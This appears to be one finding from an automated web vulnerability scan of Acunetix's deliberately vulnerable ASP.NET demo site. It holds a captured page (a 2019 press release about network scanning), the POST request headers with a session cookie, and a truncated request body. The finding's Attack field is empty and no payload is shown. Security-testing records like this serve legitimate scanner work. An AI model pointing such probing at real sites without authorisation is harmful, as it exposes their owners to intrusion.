Response Body - size: 22,875 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGZvvLHX89VirHfgZv59zKO75WKS" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	POST
Parameter
Attack
Evidence	<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
Show / hide Request and Response
Request Header - size: 422 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 Content-Length: 10937 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,937 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1h